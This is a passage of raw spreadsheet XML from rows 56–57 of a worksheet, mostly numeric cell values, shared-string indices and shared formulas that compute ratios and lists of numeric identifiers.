        <v>1.0</v>
      </c>
      <c r="AQ56" s="100">
        <v>8.0</v>
      </c>
      <c r="AR56" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS56" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT56" s="100">
        <f t="shared" si="98"/>
        <v>1917</v>
      </c>
      <c r="AU56" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV56" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW56" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX56" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY56" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ56" s="100">
        <v>0.0</v>
      </c>
      <c r="BA56" s="102">
        <v>119.0</v>
      </c>
      <c r="BB56" s="102">
        <v>2.0</v>
      </c>
      <c r="BC56" s="102">
        <v>8.0</v>
      </c>
      <c r="BD56" s="102">
        <v>8.0</v>
      </c>
      <c r="BE56" s="102">
        <v>0.0</v>
      </c>
      <c r="BF56" s="102">
        <v>0.0</v>
      </c>
      <c r="BG56" s="102">
        <v>0.0</v>
      </c>
      <c r="BH56" s="102">
        <v>0.0</v>
      </c>
      <c r="BI56" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ56" s="102">
        <v>8.0</v>
      </c>
      <c r="BK56" s="102">
        <v>8.0</v>
      </c>
      <c r="BL56" s="103">
        <f t="shared" si="3"/>
        <v>0.2222222222</v>
      </c>
      <c r="BM56" s="103">
        <f t="shared" si="4"/>
        <v>0.2222222222</v>
      </c>
      <c r="BN56" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO56" s="103">
        <f t="shared" si="6"/>
        <v>0.5</v>
      </c>
      <c r="BP56" s="103">
        <f t="shared" si="7"/>
        <v>0.5</v>
      </c>
      <c r="BQ56" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR56" s="103">
        <f t="shared" si="9"/>
        <v>0.5</v>
      </c>
      <c r="BS56" s="103">
        <f t="shared" si="10"/>
        <v>0.5</v>
      </c>
      <c r="BT56" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU56" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV56" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW56" s="104" t="s">
        <v>1120</v>
      </c>
      <c r="BX56" s="104">
        <v>7.0</v>
      </c>
      <c r="BY56" s="104">
        <v>46.0</v>
      </c>
      <c r="BZ56" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA56" s="104" t="s">
        <v>1120</v>
      </c>
      <c r="CB56" s="104">
        <v>7.0</v>
      </c>
      <c r="CC56" s="104">
        <v>46.0</v>
      </c>
      <c r="CD56" s="104">
        <v>1917.0</v>
      </c>
      <c r="CE56" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF56" s="104">
        <f t="shared" si="90"/>
        <v>1917</v>
      </c>
      <c r="CG56" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH56" s="104" t="s">
        <v>1121</v>
      </c>
      <c r="CI56" s="104" t="s">
        <v>1122</v>
      </c>
      <c r="CJ56" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK56" s="104">
        <v>5.0</v>
      </c>
      <c r="CL56" s="104">
        <v>26.0</v>
      </c>
      <c r="CM56" s="105">
        <v>25.0</v>
      </c>
      <c r="CN56" s="105">
        <v>12.0</v>
      </c>
      <c r="CO56" s="105">
        <v>26.0</v>
      </c>
      <c r="CP56" s="105">
        <v>8.0</v>
      </c>
      <c r="CQ56" s="105">
        <v>38.0</v>
      </c>
      <c r="CR56" s="105">
        <v>46.0</v>
      </c>
      <c r="CS56" s="105">
        <v>9.0</v>
      </c>
      <c r="CT56" s="105">
        <v>0.0</v>
      </c>
      <c r="CU56" s="105">
        <v>16.0</v>
      </c>
      <c r="CV56" s="105">
        <v>16.0</v>
      </c>
      <c r="CW56" s="105">
        <v>12.0</v>
      </c>
      <c r="CX56" s="105">
        <v>26.0</v>
      </c>
      <c r="CY56" s="105">
        <v>8.0</v>
      </c>
      <c r="CZ56" s="105">
        <v>38.0</v>
      </c>
      <c r="DA56" s="105">
        <v>46.0</v>
      </c>
      <c r="DB56" s="106">
        <f t="shared" si="15"/>
        <v>1.333333333</v>
      </c>
      <c r="DC56" s="106">
        <f t="shared" si="16"/>
        <v>1.333333333</v>
      </c>
      <c r="DD56" s="106">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="DE56" s="106">
        <f t="shared" si="18"/>
        <v>1.625</v>
      </c>
      <c r="DF56" s="106">
        <f t="shared" si="19"/>
        <v>1.625</v>
      </c>
      <c r="DG56" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH56" s="106">
        <f t="shared" si="21"/>
        <v>2.875</v>
      </c>
      <c r="DI56" s="106">
        <f t="shared" si="22"/>
        <v>2.875</v>
      </c>
      <c r="DJ56" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK56" s="107">
        <f t="shared" si="77"/>
        <v>0.8181818182</v>
      </c>
      <c r="DL56" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM56" s="108" t="s">
        <v>1123</v>
      </c>
      <c r="DN56" s="108">
        <v>8.0</v>
      </c>
      <c r="DO56" s="108">
        <v>54.0</v>
      </c>
      <c r="DP56" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ56" s="108" t="s">
        <v>1124</v>
      </c>
      <c r="DR56" s="108">
        <v>8.0</v>
      </c>
      <c r="DS56" s="108">
        <v>54.0</v>
      </c>
      <c r="DT56" s="108" t="s">
        <v>1023</v>
      </c>
      <c r="DU56" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV56" s="108" t="str">
        <f t="shared" si="91"/>
        <v>1917, 50447</v>
      </c>
      <c r="DW56" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX56" s="108" t="s">
        <v>1125</v>
      </c>
      <c r="DY56" s="108" t="s">
        <v>1126</v>
      </c>
      <c r="DZ56" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA56" s="108">
        <v>5.0</v>
      </c>
      <c r="EB56" s="108">
        <v>26.0</v>
      </c>
      <c r="EC56" s="109">
        <v>119.0</v>
      </c>
      <c r="ED56" s="109">
        <v>12.0</v>
      </c>
      <c r="EE56" s="109">
        <v>27.0</v>
      </c>
      <c r="EF56" s="109">
        <v>16.0</v>
      </c>
      <c r="EG56" s="109">
        <v>38.0</v>
      </c>
      <c r="EH56" s="109">
        <v>54.0</v>
      </c>
      <c r="EI56" s="109">
        <v>9.0</v>
      </c>
      <c r="EJ56" s="109">
        <v>1.0</v>
      </c>
      <c r="EK56" s="109">
        <v>16.0</v>
      </c>
      <c r="EL56" s="109">
        <v>16.0</v>
      </c>
      <c r="EM56" s="109">
        <v>12.0</v>
      </c>
      <c r="EN56" s="109">
        <v>27.0</v>
      </c>
      <c r="EO56" s="109">
        <v>16.0</v>
      </c>
      <c r="EP56" s="109">
        <v>38.0</v>
      </c>
      <c r="EQ56" s="109">
        <v>54.0</v>
      </c>
      <c r="ER56" s="110">
        <f t="shared" si="27"/>
        <v>1.333333333</v>
      </c>
      <c r="ES56" s="110">
        <f t="shared" si="28"/>
        <v>1.333333333</v>
      </c>
      <c r="ET56" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU56" s="110">
        <f t="shared" si="30"/>
        <v>1.6875</v>
      </c>
      <c r="EV56" s="110">
        <f t="shared" si="31"/>
        <v>1.6875</v>
      </c>
      <c r="EW56" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX56" s="110">
        <f t="shared" si="33"/>
        <v>3.375</v>
      </c>
      <c r="EY56" s="110">
        <f t="shared" si="34"/>
        <v>3.375</v>
      </c>
      <c r="EZ56" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA56" s="110">
        <f t="shared" si="79"/>
        <v>0.9090909091</v>
      </c>
      <c r="FB56" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC56" s="111" t="s">
        <v>1127</v>
      </c>
      <c r="FD56" s="111">
        <v>16.0</v>
      </c>
      <c r="FE56" s="111">
        <v>91.0</v>
      </c>
      <c r="FF56" s="101" t="s">
        <v>1128</v>
      </c>
      <c r="FG56" s="111" t="s">
        <v>1129</v>
      </c>
      <c r="FH56" s="111">
        <v>11.0</v>
      </c>
      <c r="FI56" s="111">
        <v>72.0</v>
      </c>
      <c r="FJ56" s="111" t="s">
        <v>1130</v>
      </c>
      <c r="FK56" s="111" t="s">
        <v>1131</v>
      </c>
      <c r="FL56" s="111" t="str">
        <f t="shared" si="95"/>
        <v>1917, 2002752, 2002749, 50447, 2101917, 2101620</v>
      </c>
      <c r="FM56" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN56" s="111" t="s">
        <v>1132</v>
      </c>
      <c r="FO56" s="111" t="s">
        <v>1133</v>
      </c>
      <c r="FP56" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ56" s="111">
        <v>7.0</v>
      </c>
      <c r="FR56" s="111">
        <v>30.0</v>
      </c>
      <c r="FS56" s="112">
        <v>25.0</v>
      </c>
      <c r="FT56" s="112">
        <v>14.0</v>
      </c>
      <c r="FU56" s="112">
        <v>41.0</v>
      </c>
      <c r="FV56" s="112">
        <v>16.0</v>
      </c>
      <c r="FW56" s="112">
        <v>75.0</v>
      </c>
      <c r="FX56" s="112">
        <v>91.0</v>
      </c>
      <c r="FY56" s="112">
        <v>9.0</v>
      </c>
      <c r="FZ56" s="112">
        <v>0.0</v>
      </c>
      <c r="GA56" s="112">
        <v>16.0</v>
      </c>
      <c r="GB56" s="112">
        <v>16.0</v>
      </c>
      <c r="GC56" s="112">
        <v>12.0</v>
      </c>
      <c r="GD56" s="112">
        <v>37.0</v>
      </c>
      <c r="GE56" s="112">
        <v>16.0</v>
      </c>
      <c r="GF56" s="112">
        <v>56.0</v>
      </c>
      <c r="GG56" s="112">
        <v>72.0</v>
      </c>
      <c r="GH56" s="113">
        <f t="shared" si="39"/>
        <v>1.555555556</v>
      </c>
      <c r="GI56" s="113">
        <f t="shared" si="40"/>
        <v>1.333333333</v>
      </c>
      <c r="GJ56" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK56" s="113">
        <f t="shared" si="42"/>
        <v>2.5625</v>
      </c>
      <c r="GL56" s="113">
        <f t="shared" si="43"/>
        <v>2.3125</v>
      </c>
      <c r="GM56" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN56" s="113">
        <f t="shared" si="45"/>
        <v>5.6875</v>
      </c>
      <c r="GO56" s="113">
        <f t="shared" si="46"/>
        <v>4.5</v>
      </c>
      <c r="GP56" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ56" s="114">
        <f t="shared" si="81"/>
        <v>0.8181818182</v>
      </c>
      <c r="GR56" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS56" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT56" s="94" t="s">
        <v>1134</v>
      </c>
      <c r="GU56" s="153">
        <v>12449.0</v>
      </c>
      <c r="GV56" s="116">
        <v>1.0</v>
      </c>
      <c r="GW56" s="116">
        <v>2.0</v>
      </c>
      <c r="GX56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD56" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE56" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF56" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG56" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH56" s="116" t="s">
        <v>1135</v>
      </c>
      <c r="HI56" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ56" s="93" t="s">
        <v>1136</v>
      </c>
      <c r="HK56" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL56" s="93">
        <v>117.0</v>
      </c>
      <c r="HM56" s="93">
        <f t="shared" si="83"/>
        <v>8</v>
      </c>
      <c r="HN56" s="93">
        <v>0.0</v>
      </c>
      <c r="HO56" s="93">
        <v>8.0</v>
      </c>
      <c r="HP56" s="93">
        <v>10.0</v>
      </c>
      <c r="HQ56" s="118">
        <f t="shared" si="53"/>
        <v>0.8888888889</v>
      </c>
      <c r="HR56" s="118">
        <f t="shared" si="54"/>
        <v>0.9090909091</v>
      </c>
      <c r="HS56" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT56" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU56" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV56" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW56" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX56" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC56" s="120" t="str">
        <f t="shared" ref="IC56:IC58" si="100">HV56</f>
        <v>-</v>
      </c>
      <c r="ID56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH56" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II56" s="99" t="s">
        <v>1137</v>
      </c>
      <c r="IJ56" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK56" s="99">
        <v>20.0</v>
      </c>
      <c r="IL56" s="99">
        <v>0.0</v>
      </c>
      <c r="IM56" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN56" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO56" s="98">
        <v>0.0</v>
      </c>
      <c r="IP56" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ56" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR56" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS56" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT56" s="127"/>
      <c r="IU56" s="127"/>
      <c r="IV56" s="127"/>
      <c r="IW56" s="127"/>
      <c r="IX56" s="127"/>
      <c r="IY56" s="127"/>
      <c r="IZ56" s="127"/>
      <c r="JA56" s="127"/>
      <c r="JB56" s="127"/>
      <c r="JC56" s="127"/>
      <c r="JD56" s="127"/>
      <c r="JE56" s="127"/>
      <c r="JF56" s="127"/>
      <c r="JG56" s="127"/>
      <c r="JH56" s="127"/>
      <c r="JI56" s="127"/>
      <c r="JJ56" s="127"/>
      <c r="JK56" s="127"/>
      <c r="JL56" s="127"/>
      <c r="JM56" s="127"/>
      <c r="JN56" s="127"/>
      <c r="JO56" s="127"/>
      <c r="JP56" s="127"/>
      <c r="JQ56" s="127"/>
      <c r="JR56" s="127"/>
      <c r="JS56" s="127"/>
      <c r="JT56" s="127"/>
      <c r="JU56" s="127"/>
      <c r="JV56" s="127"/>
      <c r="JW56" s="127"/>
      <c r="JX56" s="127"/>
      <c r="JY56" s="127"/>
      <c r="JZ56" s="127"/>
      <c r="KA56" s="127"/>
      <c r="KB56" s="127"/>
      <c r="KC56" s="127"/>
      <c r="KD56" s="127"/>
      <c r="KE56" s="127"/>
      <c r="KF56" s="127"/>
      <c r="KG56" s="127"/>
      <c r="KH56" s="127"/>
      <c r="KI56" s="127"/>
      <c r="KJ56" s="127"/>
      <c r="KK56" s="127"/>
      <c r="KL56" s="127"/>
      <c r="KM56" s="127"/>
      <c r="KN56" s="127"/>
      <c r="KO56" s="127"/>
      <c r="KP56" s="127"/>
      <c r="KQ56" s="127"/>
      <c r="KR56" s="127"/>
      <c r="KS56" s="127"/>
      <c r="KT56" s="127"/>
      <c r="KU56" s="127"/>
      <c r="KV56" s="127"/>
      <c r="KW56" s="127"/>
      <c r="KX56" s="127"/>
      <c r="KY56" s="127"/>
      <c r="KZ56" s="127"/>
      <c r="LA56" s="127"/>
      <c r="LB56" s="127"/>
      <c r="LC56" s="127"/>
      <c r="LD56" s="127"/>
      <c r="LE56" s="127"/>
      <c r="LF56" s="127"/>
      <c r="LG56" s="127"/>
      <c r="LH56" s="127"/>
      <c r="LI56" s="127"/>
      <c r="LJ56" s="127"/>
      <c r="LK56" s="127"/>
      <c r="LL56" s="127"/>
      <c r="LM56" s="127"/>
      <c r="LN56" s="127"/>
      <c r="LO56" s="127"/>
      <c r="LP56" s="127"/>
      <c r="LQ56" s="127"/>
      <c r="LR56" s="127"/>
      <c r="LS56" s="127"/>
      <c r="LT56" s="127"/>
      <c r="LU56" s="127"/>
      <c r="LV56" s="127"/>
      <c r="LW56" s="127"/>
      <c r="LX56" s="127"/>
      <c r="LY56" s="127"/>
      <c r="LZ56" s="127"/>
      <c r="MA56" s="127"/>
      <c r="MB56" s="127"/>
      <c r="MC56" s="127"/>
      <c r="MD56" s="127"/>
      <c r="ME56" s="127"/>
      <c r="MF56" s="127"/>
      <c r="MG56" s="127"/>
      <c r="MH56" s="127"/>
      <c r="MI56" s="127"/>
      <c r="MJ56" s="127"/>
      <c r="MK56" s="127"/>
      <c r="ML56" s="127"/>
      <c r="MM56" s="127"/>
      <c r="MN56" s="127"/>
      <c r="MO56" s="127"/>
      <c r="MP56" s="127"/>
      <c r="MQ56" s="127"/>
      <c r="MR56" s="127"/>
      <c r="MS56" s="127"/>
      <c r="MT56" s="127"/>
      <c r="MU56" s="127"/>
      <c r="MV56" s="127"/>
      <c r="MW56" s="127"/>
      <c r="MX56" s="127"/>
      <c r="MY56" s="127"/>
      <c r="MZ56" s="127"/>
      <c r="NA56" s="127"/>
      <c r="NB56" s="127"/>
      <c r="NC56" s="127"/>
      <c r="ND56" s="127"/>
      <c r="NE56" s="127"/>
      <c r="NF56" s="127"/>
      <c r="NG56" s="127"/>
      <c r="NH56" s="127"/>
      <c r="NI56" s="127"/>
      <c r="NJ56" s="127"/>
      <c r="NK56" s="127"/>
      <c r="NL56" s="127"/>
      <c r="NM56" s="127"/>
      <c r="NN56" s="127"/>
      <c r="NO56" s="127"/>
      <c r="NP56" s="127"/>
      <c r="NQ56" s="127"/>
      <c r="NR56" s="127"/>
      <c r="NS56" s="127"/>
      <c r="NT56" s="127"/>
      <c r="NU56" s="127"/>
      <c r="NV56" s="127"/>
      <c r="NW56" s="127"/>
      <c r="NX56" s="127"/>
      <c r="NY56" s="127"/>
    </row>
    <row r="57" ht="153.75" customHeight="1">
      <c r="B57" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C57" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D57" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E57" s="90" t="s">
        <v>1138</v>
      </c>
      <c r="F57" s="90" t="s">
        <v>1139</v>
      </c>
      <c r="G57" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H57" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I57" s="92" t="s">
        <v>1140</v>
      </c>
      <c r="J57" s="92" t="s">
        <v>1141</v>
      </c>
      <c r="K57" s="92" t="s">
        <v>1142</v>
      </c>
      <c r="L57" s="93" t="s">
        <v>1141</v>
      </c>
      <c r="M57" s="93">
        <v>18.0</v>
      </c>
      <c r="N57" s="93">
        <v>3.0</v>
      </c>
      <c r="O57" s="93">
        <v>0.0</v>
      </c>
      <c r="P57" s="93">
        <v>2.0</v>
      </c>
      <c r="Q57" s="93">
        <f t="shared" si="99"/>
        <v>2</v>
      </c>
      <c r="R57" s="93">
        <v>2.0</v>
      </c>
      <c r="S57" s="93">
        <v>0.0</v>
      </c>
      <c r="T57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U57" s="95" t="s">
        <v>269</v>
      </c>
      <c r="V57" s="96" t="s">
        <v>1143</v>
      </c>
      <c r="W57" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X57" s="97" t="s">
        <v>1144</v>
      </c>
      <c r="Y57" s="96" t="s">
        <v>1145</v>
      </c>
      <c r="Z57" s="96" t="s">
        <v>1146</v>
      </c>
      <c r="AA57" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB57" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC57" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD57" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE57" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF57" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG57" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH57" s="99" t="s">
        <v>1147</v>
      </c>
      <c r="AI57" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ57" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK57" s="100">
        <v>1448.0</v>
      </c>
      <c r="AL57" s="100">
        <v>1.0</v>
      </c>
      <c r="AM57" s="100">
        <v>2.0</v>
      </c>
      <c r="AN57" s="154" t="s">
        <v>12</v>
      </c>
      <c r="AO57" s="100">
        <v>1448.0</v>
      </c>
      <c r="AP57" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ57" s="100">
        <v>2.0</v>
      </c>
      <c r="AR57" s="100">
        <v>1448.0</v>
      </c>
      <c r="AS57" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT57" s="100">
        <f t="shared" si="98"/>
        <v>1448</v>
      </c>
      <c r="AU57" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV57" s="100">
        <v>1448.0</v>
      </c>
      <c r="AW57" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX57" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY57" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ57" s="100">
        <v>0.0</v>
      </c>
      <c r="BA57" s="102">
        <v>18.0</v>
      </c>
      <c r="BB57" s="102">
        <v>2.0</v>
      </c>
      <c r="BC57" s="102">
        <v>2.0</v>
      </c>
      <c r="BD57" s="102">
        <v>2.0</v>
      </c>
      <c r="BE57" s="102">
        <v>0.0</v>
      </c>
      <c r="BF57" s="102">
        <v>0.0</v>
      </c>
      <c r="BG57" s="102">
        <v>0.0</v>
      </c>
      <c r="BH57" s="102">
        <v>0.0</v>
      </c>
      <c r="BI57" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ57" s="102">
        <v>2.0</v>
      </c>
      <c r="BK57" s="102">
        <v>2.0</v>
      </c>
      <c r="BL57" s="103">
        <f t="shared" si="3"/>
        <v>0.6666666667</v>
      </c>
      <c r="BM57" s="103">
        <f t="shared" si="4"/>
        <v>0.6666666667</v>
      </c>
      <c r="BN57" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO57" s="103">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="BP57" s="103">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="BQ57" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR57" s="103">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="BS57" s="103">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="BT57" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU57" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV57" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW57" s="104" t="s">
        <v>1148</v>
      </c>
      <c r="BX57" s="104">
        <v>2.0</v>
      </c>
      <c r="BY57" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ57" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA57" s="104" t="s">
        <v>1149</v>
      </c>
      <c r="CB57" s="104">
        <v>2.0</v>
      </c>
      <c r="CC57" s="104">
        <v>4.0</v>
      </c>
      <c r="CD57" s="104" t="s">
        <v>1150</v>
      </c>
      <c r="CE57" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF57" s="104" t="str">
        <f t="shared" si="90"/>
        <v>2001330, 1448</v>
      </c>
      <c r="CG57" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH57" s="104" t="s">
        <v>1151</v>
      </c>
      <c r="CI57" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ57" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK57" s="104">
        <v>0.0</v>
      </c>
      <c r="CL57" s="104">
        <v>0.0</v>
      </c>
      <c r="CM57" s="105">
        <v>17.0</v>
      </c>
      <c r="CN57" s="105">
        <v>4.0</v>
      </c>
      <c r="CO57" s="105">
        <v>4.0</v>
      </c>
      <c r="CP57" s="105">
        <v>2.0</v>
      </c>
      <c r="CQ57" s="105">
        <v>2.0</v>
      </c>
      <c r="CR57" s="105">
        <v>4.0</v>
      </c>
      <c r="CS57" s="105">
        <v>0.0</v>
      </c>
      <c r="CT57" s="105">
        <v>0.0</v>
      </c>
      <c r="CU57" s="105">
        <v>0.0</v>
      </c>
      <c r="CV57" s="105">
        <v>0.0</v>
      </c>
      <c r="CW57" s="105">
        <v>4.0</v>
      </c>
      <c r="CX57" s="105">
        <v>4.0</v>
      </c>
      <c r="CY57" s="105">
        <v>2.0</v>
      </c>
      <c r="CZ57" s="105">
        <v>2.0</v>
      </c>
      <c r="DA57" s="105">
        <v>4.0</v>
      </c>
      <c r="DB57" s="106">
        <f t="shared" si="15"/>
        <v>1.333333333</v>
      </c>
      <c r="DC57" s="106">
        <f t="shared" si="16"/>
        <v>1.333333333</v>
      </c>
      <c r="DD57" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE57" s="106">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="DF57" s="106">
        <f t="shared" si="19"/>
        <v>2</v>
      </c>
      <c r="DG57" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH57" s="106">
        <f t="shared" si="21"/>
        <v>2</v>
      </c>
      <c r="DI57" s="106">
        <f t="shared" si="22"/>
        <v>2</v>
      </c>
      <c r="DJ57" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK57" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL57" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM57" s="108" t="s">
        <v>1152</v>
      </c>
      <c r="DN57" s="108">
        <v>2.0</v>
      </c>
      <c r="DO57" s="108">
        <v>4.0</v>
      </c>
      <c r="DP57" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ57" s="108" t="s">
        <v>1153</v>
      </c>
      <c r="DR57" s="108">
        <v>2.0</v>
      </c>
      <c r="DS57" s="108">
        <v>4.0</v>
      </c>
      <c r="DT57" s="108" t="s">
        <v>1154</v>
      </c>
      <c r="DU57" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV57" s="108" t="str">
        <f t="shared" si="91"/>
        <v>2001330, 1448</v>
      </c>
      <c r="DW57" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX57" s="108" t="s">
        <v>1155</v>
      </c>
      <c r="DY57" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ57" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA57" s="108">
        <v>0.0</v>
      </c>
      <c r="EB57" s="108">
        <v>0.0</v>
      </c>
      <c r="EC57" s="109">
        <v>18.0</v>
      </c>
      <c r="ED57" s="109">
        <v>4.0</v>
      </c>
      <c r="EE57" s="109">
        <v>4.0</v>
      </c>
      <c r="EF57" s="109">
        <v>2.0</v>
      </c>
      <c r="EG57" s="109">
        <v>2.0</v>
      </c>
      <c r="EH57" s="109">
        <v>4.0</v>
      </c>
      <c r="EI57" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ57" s="109">
        <v>0.0</v>
      </c>
      <c r="EK57" s="109">
        <v>0.0</v>
      </c>
      <c r="EL57" s="109">
        <v>0.0</v>
      </c>
      <c r="EM57" s="109">
        <v>4.0</v>
      </c>
      <c r="EN57" s="109">
        <v>4.0</v>
      </c>
      <c r="EO57" s="109">
        <v>2.0</v>
      </c>
      <c r="EP57" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ57" s="109">
        <v>4.0</v>
      </c>
      <c r="ER57" s="110">
        <f t="shared" si="27"/>
        <v>1.333333333</v>
      </c>
      <c r="ES57" s="110">
        <f t="shared" si="28"/>
        <v>1.333333333</v>
      </c>
      <c r="ET57" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU57" s="110">
        <f t="shared" si="30"/>
        <v>2</v>
      </c>
      <c r="EV57" s="110">
        <f t="shared" si="31"/>
        <v>2</v>
      </c>
      <c r="EW57" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX57" s="110">
        <f t="shared" si="33"/>
        <v>2</v>
      </c>
      <c r="EY57" s="110">
        <f t="shared" si="34"/>
        <v>2</v>
      </c>
      <c r="EZ57" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA57" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
